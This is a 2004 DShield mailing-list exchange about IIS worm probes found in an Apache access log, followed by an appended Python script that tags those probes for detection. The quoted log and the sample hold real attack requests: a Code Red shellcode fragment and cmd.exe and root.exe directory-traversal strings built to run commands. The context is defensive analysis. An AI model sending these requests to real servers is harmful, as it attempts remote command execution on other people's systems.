[Dshield] Suspect HTTP-activity

Al Reust areust at comcast.net
Sat Jan 24 01:48:38 GMT 2004


Interesting in that no one else said this..

While someone mentioned Code Red they did not mention some of the other 
"Quick Tools" to topple an unprotected IIS Server.

This is what I would expect from a script kiddie probing to see what they can 
grab (as it responded to port 80). It appears to be a tool that combines 
the "most popular exploits," single pass on an IP Address.

Most IIS SysAdmins would have removed unwanted extensions/ISAPI filters 
and/or used the IISLockdown Tool and installed URLScan.. Those that have 
not, would be toppled. So yes this is a "Windows" based attack.

Al

At 07:30 PM 1/23/2004 +0100, you wrote:
>Hello,
>I'm a fresh subscriber to this list and the very reason I stumbled upon it 
>was that I was investigating some activity that apache logged and that 
>made me a little suspicious about the intentions behind the requests. So 
>first off, Hello!
>
>I've been trying to go through the most recent archives and while what you 
>discuss seems to be both interesting and important, I haven't found 
>anything that matches my query.
>
>If this is the wrong place for my question, I can take pointers to other 
>lists/sites for an answer. :-)
>
>Below are excerpts from my apache/access.log (I'm running Win2000Pro). I 
>haven't publicly announced my web-server in any way -- I just use it for 
>development of web-code and invite other developers to check it out.
>
>Most of these logs seem to indicate nothing actually happened 
>(404-status), but I'm curious as to what it's all about and if anyone 
>might be interested in this information. Any DShield-like service that 
>collects apache-logs? ;-)
>
>Most of these requests seem to be someone wanting to list my disk.
>
>Are there any known worms that create these requests? Should I act in any way?
>
>Any help is much appreciated!
>
>If anyone wants me to post more logs, I can do so (it's basically just the 
>same requests a couple of times)
>
>Martin
>
>218.11.129.221 - - [20/Jan/2004:11:22:29 +0100] "GET 
>/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 
>HTTP/1.0" 404 308
>127.0.0.1 - - [20/Jan/2004:12:56:23 +0100] "GET /default.ida HTTP/1.1" 404 320
>210.161.69.133 - - [22/Jan/2004:08:44:28 +0100] "GET 
>/scripts/nsiislog.dll" 404 -
>202.71.136.211 - - [22/Jan/2004:15:12:52 +0100] "SEARCH / HTTP/1.1" 200 1916
>194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET 
>/scripts/root.exe?/c+dir HTTP/1.0" 404 307
>194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET /MSADC/root.exe?/c+dir 
>HTTP/1.0" 404 305
>194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET 
>/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
>194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET 
>/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
>194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET 
>/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
>194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET 
>/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
>HTTP/1.0" 404 346
>194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET 
>/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
>HTTP/1.0" 404 346
>194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET 
>/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir 
>HTTP/1.0" 404 362
>194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET 
>/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
>194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET 
>/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
>194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET 
>/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
>194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET 
>/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
>194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET 
>/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 312
>194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET 
>/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 312
>194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET 
>/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
>194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET 
>/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
>
>_______________________________________________
>list mailing list
>list at dshield.org
>To change your subscription options (or unsubscribe), see: 
>http://www.dshield.org/mailman/listinfo/list
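As an added illustration, not part of this thread or either poster's own code, the following Python script parses Apache access-log lines of the kind Martin quoted and tags the well-known IIS probe patterns Al is describing: the Code Red request for /default.ida with a %u-encoded payload, the root.exe and cmd.exe requests carrying double-URL-encoded (..%255c..) and overlong UTF-8 (..%c0%af.., ..%c1%1c..) traversal sequences that the Nimda-era IIS decode bugs accepted, the /scripts/nsiislog.dll ISAPI probe, and the WebDAV SEARCH request. The sample lines are constructed after the quoted excerpt (one benign request is added, and the long Code Red filler is shortened); the tag names and the function names are my own.

```python
"""Tag IIS worm/scanner probes in Apache access-log lines (constructed example)."""
import re
from collections import defaultdict
from urllib.parse import unquote, unquote_to_bytes

# Constructed sample, modelled on the log excerpt quoted in the thread.
SAMPLE_LOG = """\
218.11.129.221 - - [20/Jan/2004:11:22:29 +0100] "GET /default.ida?XXXXXXXX%u9090%u6858%ucbd3%u7801=a HTTP/1.0" 404 308
210.161.69.133 - - [22/Jan/2004:08:44:28 +0100] "GET /scripts/nsiislog.dll" 404 -
202.71.136.211 - - [22/Jan/2004:15:12:52 +0100] "SEARCH / HTTP/1.1" 200 1916
194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 307
194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
10.0.0.5 - - [22/Jan/2004:18:00:00 +0100] "GET /index.html HTTP/1.1" 200 1234
"""

# Common Log Format; the protocol token is optional because HTTP/0.9-style
# probes (the nsiislog.dll line above) omit it, and bytes may be "-".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: (?P<proto>HTTP/\d\.\d))?" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-)$'
)


def parse_line(line):
    """Return a dict of log fields, or None if the line is not CLF."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def decode_layers(path, max_rounds=3):
    """Percent-decode repeatedly until the string stops changing.

    A path that needs more than one round (..%255c.. -> ..%5c.. -> ..\\..)
    was double-encoded to slip past a single-pass decoder."""
    layers = [path]
    for _ in range(max_rounds):
        nxt = unquote(layers[-1], errors="replace")
        if nxt == layers[-1]:
            break
        layers.append(nxt)
    return layers


def classify(rec):
    """Return sorted probe tags for one parsed request (empty if benign)."""
    tags = set()
    path = rec["path"]
    layers = decode_layers(path)
    final = layers[-1]
    low = final.lower()
    if rec["method"] == "SEARCH":
        tags.add("webdav-search-probe")
    if low.startswith("/default.ida") and "%u" in path.lower():
        tags.add("code-red-ida-probe")          # .ida ISAPI overflow payload
    if "nsiislog.dll" in low:
        tags.add("nsiislog-isapi-probe")        # Windows Media Services ISAPI
    if "root.exe" in low:
        tags.add("root.exe-backdoor-probe")     # cmd.exe copy left by Nimda/Code Red II
    if "cmd.exe" in low:
        tags.add("cmd.exe-traversal-probe")
    if len(layers) > 2:
        tags.add("double-url-encoding")
    raw = unquote_to_bytes(path)
    if b"\xc0" in raw or b"\xc1" in raw:        # never valid UTF-8 lead bytes
        tags.add("overlong-utf8-encoding")
    if "../" in final or "..\\" in final:
        tags.add("directory-traversal")
    return sorted(tags)


def summarize(log_text):
    """Group tagged requests per source address: {ip: {tag: count}}."""
    per_ip = defaultdict(lambda: defaultdict(int))
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for tag in classify(rec):
            per_ip[rec["ip"]][tag] += 1
    return {ip: dict(counts) for ip, counts in per_ip.items()}


if __name__ == "__main__":
    for ip, counts in summarize(SAMPLE_LOG).items():
        print(ip, counts)
```

On Apache every one of these requests ends in a 404 or 400 because the paths do not exist, which is why nothing "happened" in Martin's log; the useful output is the per-source summary, which shows one host firing the whole battery within the same second, exactly the single-pass multi-exploit tool Al describes. On IIS the same features (cmd.exe and root.exe in the URL, double-encoded and high-bit characters) are what URLScan's default rules and the IISLockdown ISAPI/extension removal are meant to reject, so tags like these are also a quick way to confirm a lockdown is actually blocking the traffic rather than just logging it.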



